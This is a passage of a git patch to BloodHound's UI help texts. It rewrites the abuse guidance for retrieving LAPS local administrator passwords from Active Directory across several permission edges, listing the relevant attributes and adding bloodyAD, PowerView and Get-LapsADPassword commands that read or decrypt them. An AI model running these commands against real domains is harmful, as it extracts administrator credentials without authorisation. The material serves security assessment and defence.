legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + + + See Windows abuse for retrieving and decrypting the encrypted attributes. + Resource-Based Constrained Delegation First, if an attacker does not control an account with an SPN set, a new attacker-controlled @@ -414,25 +434,6 @@ const LinuxAbuse: FC = ( {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"} - Retrieve LAPS Passwords - - - If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the - AllExtendedRights permission included grants {sourceName} enough permissions to retrieve LAPS - passwords domain-wise. - - - - - pyLAPS - {' '} - can be used for that purpose: - - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - - Generic Descendent Object Takeover The simplest and most straight forward way to obtain control of the objects of the domain is to diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx index d157781ad1..d5ee5e9800 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx @@ -154,6 +154,18 @@ const References: FC = () => { href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'> https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53 +
+ + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + +
+ + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + +
+ + https://github.com/CravateRouge/bloodyAD + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx index 3bbd5e23d5..c5bdb87db4 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx @@ -283,10 +283,7 @@ const WindowsAbuse: FC =
The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. + administrator) password of {targetName}. @@ -301,6 +298,49 @@ const WindowsAbuse: FC = Constrained Delegation attack. + Retrieve LAPS Password + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: + + + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + + + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: + + + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). + + Shadow Credentials attack To abuse the permission, use Whisker. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx index 6258842fc4..d5380109a7 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx @@ -250,22 +250,42 @@ const LinuxAbuse: FC = ({ sourceName, targ Retrieve LAPS Password - Full control of a computer object is abusable when the computer's local admin account - credential is controlled with LAPS. The clear-text password for the local administrator - account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With - full control of the computer object, you may have the ability to read this attribute, or - grant yourself the ability to read the attribute by modifying the computer object's security - descriptor. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - - pyLAPS - {' '} - can be used to retrieve LAPS passwords: + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} + {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + + + See Windows abuse for retrieving and decrypting the encrypted attributes. + Resource-Based Constrained Delegation First, if an attacker does not control an account with an SPN set, a new attacker-controlled @@ -450,25 +470,6 @@ const LinuxAbuse: FC = ({ sourceName, targ {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"} - Retrieve LAPS Passwords - - - If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the - AllExtendedRights permission included grants {sourceName} enough permissions to retrieve LAPS - passwords domain-wise. - - - - - pyLAPS - {' '} - can be used for that purpose: - - - - {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'} - - Generic Descendent Object Takeover The simplest and most straight forward way to obtain control of the objects of the domain is to diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx index 9ce4b4645e..05b24c4fa8 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/References.tsx @@ -99,6 +99,18 @@ const References: FC = () => { href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'> https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53 +
+ + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + +
+ + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + +
+ + https://github.com/CravateRouge/bloodyAD + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx index 0fbdf7bb87..ce81766ea8 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx @@ -357,10 +357,7 @@ const WindowsAbuse: FC =
The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500 - administrator) password of {targetName}. {sourceName} can do so by listing a computer - object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of - the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '} - {targetName}. + administrator) password of {targetName}. @@ -375,6 +372,49 @@ const WindowsAbuse: FC = Constrained Delegation attack. + Retrieve LAPS Password + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: + + + {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + + + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: + + + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + + The encrypted attributes can also be retrieved and decrypted using + lapsv2decrypt + {' '} (dotnet or BOF). + + Shadow Credentials attack To abuse the permission, use Whisker. From d21ee634b8ab89b48bca33db3623a9ff4acfeb61 Mon Sep 17 00:00:00 2001 From: jknudsen Date: Mon, 16 Dec 2024 11:31:51 +0100 Subject: [PATCH 2/4] prepare-for-codereview --- packages/go/graphschema/ad/ad.go | 1 - packages/go/graphschema/azure/azure.go | 1 - packages/go/graphschema/common/common.go | 1 - .../AllExtendedRights/LinuxAbuse.tsx | 85 ++++++++------- .../AllExtendedRights/References.tsx | 16 ++- .../AllExtendedRights/WindowsAbuse.tsx | 102 ++++++++++-------- .../HelpTexts/GenericAll/LinuxAbuse.tsx | 15 +-- .../HelpTexts/GenericAll/References.tsx | 16 ++- .../HelpTexts/GenericAll/WindowsAbuse.tsx | 29 +++-- .../components/HelpTexts/Owns/LinuxAbuse.tsx | 17 +-- .../components/HelpTexts/Owns/References.tsx | 16 ++- .../HelpTexts/Owns/WindowsAbuse.tsx | 29 +++-- .../HelpTexts/ReadLAPSPassword/General.tsx | 17 ++- .../HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx | 8 +- .../HelpTexts/ReadLAPSPassword/References.tsx | 16 ++- .../ReadLAPSPassword/WindowsAbuse.tsx | 19 ++-- .../HelpTexts/WriteDacl/LinuxAbuse.tsx | 17 +-- .../HelpTexts/WriteDacl/References.tsx | 16 ++- .../HelpTexts/WriteDacl/WindowsAbuse.tsx | 29 +++-- .../HelpTexts/WriteOwner/LinuxAbuse.tsx | 17 +-- .../HelpTexts/WriteOwner/References.tsx | 16 ++- .../HelpTexts/WriteOwner/WindowsAbuse.tsx | 27 +++-- 22 files changed, 301 insertions(+), 209 deletions(-) diff --git a/packages/go/graphschema/ad/ad.go b/packages/go/graphschema/ad/ad.go index 5dad6bea8d..4a948558ff 100644 --- a/packages/go/graphschema/ad/ad.go +++ b/packages/go/graphschema/ad/ad.go @@ -21,7 +21,6 @@ package ad import ( "errors" - graph "github.com/specterops/bloodhound/dawgs/graph" ) diff --git a/packages/go/graphschema/azure/azure.go b/packages/go/graphschema/azure/azure.go index 787ee392e6..00b20f190f 100644 --- a/packages/go/graphschema/azure/azure.go +++ b/packages/go/graphschema/azure/azure.go @@ -21,7 +21,6 @@ package azure import ( "errors" - graph "github.com/specterops/bloodhound/dawgs/graph" ) diff --git a/packages/go/graphschema/common/common.go b/packages/go/graphschema/common/common.go index 73edf123fa..631871c6bf 100644 --- a/packages/go/graphschema/common/common.go +++ b/packages/go/graphschema/common/common.go @@ -21,7 +21,6 @@ package common import ( "errors" - graph "github.com/specterops/bloodhound/dawgs/graph" ) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx index 8f6eba5fdf..cace7b88e1 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/LinuxAbuse.tsx @@ -57,46 +57,51 @@ const LinuxAbuse: FC = ({ sourceName, targ ); case 'Computer': - return ( - <> - - The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - - - For systems using legacy LAPS, the following AD computer object properties are relevant: -
- - ms-Mcs-AdmPwd: The plaintext LAPS password -
- - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time -
-
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: -
- - msLAPS-Password: The plaintext LAPS password -
- - msLAPS-PasswordExpirationTime: The LAPS password expiration time -
- - msLAPS-EncryptedPassword: The encrypted LAPS password -
- - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history -
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password -
- - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
-
- - Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - - - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} - - - See Windows abuse for retrieving and decrypting the encrypted attributes. - - - ); + return ( + <> + + The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 + administrator) password for {targetName}. + + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are + relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: + + + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } + + + See Windows abuse for retrieving and decrypting the encrypted attributes. + + + ); case 'Domain': return ( <> diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx index c7380492d4..14416e48fd 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AllExtendedRights/References.tsx @@ -42,16 +42,22 @@ const References: FC = () => { https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD
= ({ ); case 'Computer': - return ( - <> - - The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. - - - For systems using legacy LAPS, the following AD computer object properties are relevant: -
- - ms-Mcs-AdmPwd: The plaintext LAPS password -
- - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time -
-
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: -
- - msLAPS-Password: The plaintext LAPS password -
- - msLAPS-PasswordExpirationTime: The LAPS password expiration time -
- - msLAPS-EncryptedPassword: The encrypted LAPS password -
- - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history -
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password -
- - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
-
- - Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - - - {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} - - - Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - - - The encrypted attributes can also be retrieved and decrypted using + return ( + <> + + The AllExtendedRights permission allows {sourceName} to retrieve the LAPS (RID 500 + administrator) password for {targetName}. + + + For systems using legacy LAPS, the following AD computer object properties are relevant: +
+ - ms-Mcs-AdmPwd: The plaintext LAPS password +
+ - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time +
+
+ + For systems using Windows LAPS (2023 edition), the following AD computer object properties are + relevant: +
+ - msLAPS-Password: The plaintext LAPS password +
+ - msLAPS-PasswordExpirationTime: The LAPS password expiration time +
+ - msLAPS-EncryptedPassword: The encrypted LAPS password +
+ - msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history +
+ - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password +
+ - msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history +
+
+ + Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: + + + { + 'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"' + } + + + Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: + + {'Get-LapsADPassword "WIN10" -AsPlainText'} + + The encrypted attributes can also be retrieved and decrypted using{' '} + lapsv2decrypt - {' '} (dotnet or BOF). - - - ); + {' '} + (dotnet or BOF). +
+ + ); case 'Domain': return ( diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx index 84d60352ba..a6a727c51d 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx @@ -173,8 +173,9 @@ const LinuxAbuse: FC = ( - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -184,21 +185,23 @@ const LinuxAbuse: FC = (
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } See Windows abuse for retrieving and decrypting the encrypted attributes. - Resource-Based Constrained Delegation First, if an attacker does not control an account with an SPN set, a new attacker-controlled computer account can be added with Impacket's addcomputer.py example script: diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx index 5384d4bd4a..d0b2ddb394 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx @@ -169,16 +169,22 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx index 6eb7f1e593..b781ec4124 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx @@ -239,8 +239,9 @@ const WindowsAbuse: FC = - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -250,27 +251,33 @@ const WindowsAbuse: FC =
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + { + 'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"' + } Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - + {'Get-LapsADPassword "WIN10" -AsPlainText'} - The encrypted attributes can also be retrieved and decrypted using - lapsv2decrypt - {' '} (dotnet or BOF). + The encrypted attributes can also be retrieved and decrypted using{' '} + + lapsv2decrypt + {' '} + (dotnet or BOF). Shadow Credentials attack diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx index 18136f7bda..5b6d00a956 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx @@ -230,7 +230,8 @@ const LinuxAbuse: FC = ( Retrieve LAPS Password - The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}. + The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) + password for {targetName}. For systems using legacy LAPS, the following AD computer object properties are relevant: @@ -240,8 +241,9 @@ const LinuxAbuse: FC = ( - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -251,16 +253,19 @@ const LinuxAbuse: FC = (
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD: - {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"} + { + "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime" + } See Windows abuse for retrieving and decrypting the encrypted attributes. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx index a03165c467..e6506fa46d 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx @@ -144,16 +144,22 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
- - https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword + + https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
- - https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt + + https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
- https://github.com/CravateRouge/bloodyAD + https://github.com/CravateRouge/bloodyAD ); diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx index 49374da97f..d0c0277a02 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx @@ -331,8 +331,9 @@ const WindowsAbuse: FC = - ms-Mcs-AdmPwdExpirationTime: The LAPS password expiration time
- - For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: + + For systems using Windows LAPS (2023 edition), the following AD computer object properties + are relevant:
- msLAPS-Password: The plaintext LAPS password
@@ -342,27 +343,33 @@ const WindowsAbuse: FC =
- msLAPS-EncryptedPasswordHistory: The encrypted LAPS password history
- - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) password + - msLAPS-EncryptedDSRMPassword: The encrypted Directory Services Restore Mode (DSRM) + password
- msLAPS-EncryptedDSRMPasswordHistory: The encrypted DSRM password history -
+
Plaintext attributes can be read using a simple LDAP client. For example, with PowerView: - {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'} + { + 'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"' + } Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example: - - {'Get-LapsADPassword "WIN10" -AsPlainText'} - + {'Get-LapsADPassword "WIN10" -AsPlainText'} - The encrypted attributes can also be retrieved and decrypted using - lapsv2decrypt - {' '} (dotnet or BOF). + The encrypted attributes can also be retrieved and decrypted using{' '} + + lapsv2decrypt + {' '} + (dotnet or BOF). Shadow Credentials attack diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx index 2442949f49..96b57895ae 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx @@ -27,19 +27,18 @@ const General: FC = ({ sourceName, sourceType, targetName }) => { Password Solution (LAPS) on the computer {targetName}.
- For systems using legacy LAPS, the following AD computer object properties are relevant: - - **ms-Mcs-AdmPwd**: The plaintext LAPS password. - - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password expiration time. + For systems using legacy LAPS, the following AD computer object properties are relevant: - + **ms-Mcs-AdmPwd**: The plaintext LAPS password. - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password + expiration time. For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant: - - **msLAPS-Password**: The plaintext LAPS password. - - **msLAPS-PasswordExpirationTime**: The LAPS password expiration time. - - **msLAPS-EncryptedPassword**: The encrypted LAPS password. - - **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history. - - **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password. - - **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history. + - **msLAPS-Password**: The plaintext LAPS password. - **msLAPS-PasswordExpirationTime**: The LAPS + password expiration time. - **msLAPS-EncryptedPassword**: The encrypted LAPS password. - + **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history. - + **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password. - + **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history. ); diff --git 